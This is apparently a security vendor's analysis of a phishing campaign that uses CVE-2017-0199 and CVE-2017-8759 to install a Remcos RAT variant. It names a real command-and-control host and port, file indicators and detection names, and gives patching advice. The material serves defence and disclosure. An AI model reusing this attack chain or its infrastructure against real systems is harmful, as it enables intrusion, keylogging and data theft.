Emails containing malicious attachments equipped with keyloggers and screen capture capabilities are targeting businesses worldwide, with noted attacks in Asia, Russia, and the Middle East. The campaign is designed to look like it comes from real affiliates and employees working for a well-known pharmaceutical distributor in order to make the emails more convincing and lure the recipients into opening the attached document.
Cyren detects and blocks this threat as XML/CVE170199, CVE-2017-8759!Camelot,W32/TinyDL.A and W32/Rescoms.G.
How It Works
An email arrives from what appears to be a reputable person and company in the pharmaceutical industry containing an attachment that looks like an invoice or statement.
Figure 1 : Email Sample
To initiate the installation of the main malware, this attack first exploits the Microsoft vulnerability CVE-2017-0199 to automatically update the document with malicious content—in this case, a file named “free.doc” accessed directly from the threat actor’s server.
Figure 2: CVE-2017-0199 exploit automatically updates using “free.doc” directly from the threat actor’s server.
Figure 3 : MS Word prompts user to update document from linked files.
The downloaded document contains a linked document object (with hidden text) that when executed exploits a second vulnerability known as CVE-2017-8759, which takes advantage of a vulnerability in MS Office’s SOAP WSDL Parser.
Figure 4 : Hidden linked document object
Figure 5: CVE-2017-8759 Exploit
The CVE-2017-8759 exploit runs .Net code, which drops and installs an executable binary in the Windows temporary directory. This file (which Cyren detects as W32/TinyDL.A) downloads the main malware component and saves it in %LOCALAPPDATA%avast.exe. Cyren detects the main malware component as W32/Rescoms.G.
The Backdoor payload dump strings suggest that it is a variant of Remcos RAT. Checking the latest free version of the Remote Access Trojan reveals the different capabilities it can do on an infected system.
Figure 6: Builder Options
Figure 7: Installation Options
Figure 8: Process Injection and Sandbox Detection Options
Figure 9: Keylogging Options
Figure 10: Screen Capture Options
Figure 11: Remote Options
Digging deeper on the backdoor payload, we can find the settings in the resource section of the file.
Figure 11: 1st byte is the size of the RC4 key and the actual key next to it
This version still uses the RC4 encryption and with the settings decrypted, it reveals that it will try to connect to the following remote host and use “pass” as the password.
C&C : infocolornido.publicvm.com
port : 2404
With malware exploding around the globe, it is critical that companies put essential steps in place to protect from new and existing threats.
Cloud-based Email and Web Security
It is common for threat actors to use recently disclosed/patched vulnerabilities since they know that companies are sometimes notoriously bad at updating and applying patches to their networks.
The attack takes advantage of two known exploits that Microsoft has identified and provided fixes for. Updating software and applying patches is a critical step to safeguarding your networks.
In addition to cloud-based security and system patches, another option in this kind of threat scenario is to disable the “automatic links at open” function, also used successfully with the recent DDE vulnerability. (Please note that we only tested it on Microsoft Word 2016.)
File->Options->Advanced->General->Uncheck Update automatic links at open.
Indicators of Compromise
|E-mail, Subject: Payment confirmation attached.
|E-mail, Subject: Payment confirmation attached
|Filename: Nov Payment.docx, XML/CVE170199
|Link to CVE-2017-8759 exploit
|Link to CVE-2017-8759 payload
|Filename: xin.png, XML/DropExe.A
|Filename: TMP<random>.exe, W32/TinyDL.A
|Filename: avast.exe, W32/Rescoms.G
|Filename: whmpqn.doc, CVE-2017-8759!Camelot
|Filename: epraeb, CVE178759
|Filename: usa.exe, W32/Injector.GAV